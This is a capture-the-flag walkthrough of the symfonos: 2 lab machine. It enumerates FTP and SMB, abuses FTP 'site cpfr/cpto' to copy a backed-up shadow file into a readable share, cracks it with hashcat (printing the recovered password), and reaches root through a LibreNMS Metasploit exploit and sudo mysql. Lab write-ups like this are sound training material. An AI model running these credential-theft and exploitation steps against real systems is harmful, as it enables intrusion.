Last updated: 15 Apr 24 09:34:11 (UTC)

Write-Up Symfonos-2

Symfonos-2

By Lawcky 20/01/24

Introduction

Symfonos-2

Difficulty : Medium

Additionnal info :

Name: symfonos: 2
Release date: 18 Jul 2019
Author: Zayotic
Series: symfonos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • nmap
  • enum4linux
  • smbclient
  • ftp
  • exploits (manual)
  • hashcat
  • metasploit
  • mysql setuid

Write-UP

FTP

trying anonymous

ftp anonymous@192.168.1.86

aa27edcba38e632bde319dc04aa9e379.png

need an email address

FUZZING port 80

found nothing

Enum4Linux SMB

enum4linux 192.168.1.86

bab1ccab4ba9ebfa0e7749aa8f11bd0b.png

found unix user aeolus & cronus

found domain name SYMFONOS2

smbclient //192.168.1.86/anonymous -U anonymous

c2afeb9abcb13aca54d373bc7cd752b2.png

found in share anonymous

with a log file inside which is :

3e9fdf7b9547c3391ec7b5e3667cdc51.png

4de30af5189a14213e6af12dc19bbe21.png

3ce9adc68d44f190d74f72f02fb14d56.png

seems like aeolus is the user for the anonymous share we need to get his email address to access it

FTP rce

the ftp version is vulnerable to remote code execution --> here

the exploit didnt work

yet we can still run commands through the ftp and thanks to enum4linux we know the path of the smb anonymous share

/home/aoelus/share

and in the log.txt file we found the backups of the shadow file

/var/backups/shadow.bak

we can thus run

site cpfr /var/backups/shadow.bak
site cpto /home/aeolus/share/shadow.bak

on the ftp port and then access the samba share again

smbclient //192.168.1.86/anonymous -U anonymous

086d15e40563ed5ca3b4339ce5508690.png

Hashcat

35b5a08cce54efaaaf003b2e1854df5d.png
the attack mode

hashcat -m 1800 shadow.bak ~/tools/seclists/rockyou.txt

f924487ff95ae7c504b1c4516ce0be57.png

aeolus:sergioteamo

7dc9c6eb634cc9695d69dce1a7465301.png

Privilege Escalation

from aeolus to root

1

found in the setuid

6ede3a06838c130695a267733626d0b2.png

/usr/sbin/exim4 -bV -v

86bb66aa426d8f23421f7479585d8e1b.png

found an exploit for this version in exploit-db

we take the setuid version of this exploit and run it

did not work

2

found in the services running

428599566fa15a6737167c2dda6d43c3.png

could not find any database credentials for the mysql service so lets see for the other service running on 8080

ssh -L 10.8.0.6:1234:127.0.0.1:8080 aeolus@192.168.1.86

d0903f821286693fa62205a21f8e4b6c.png

its a libreNMS service

aeolus:sergioteamo these credentials worked

c462083f5ffad243ef88ebce08b81a9d.png

could not find the version of the installation

searchsploit LibreNMS

lets try the remote code execution with metasploit

4666a9317ad94779a064f02e83e23963.png

19b7413fe220db9e6dbb0fee0808c3a9.png

Privilege Escalation

from cronos to root

user cronos has mysql as a nopasswd sudo

using gtfobins

354bd81b6c5d0183bfae06368a2d17ce.png

ce7ea03355f877d64edee3a9d1a680b2.png

got the flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.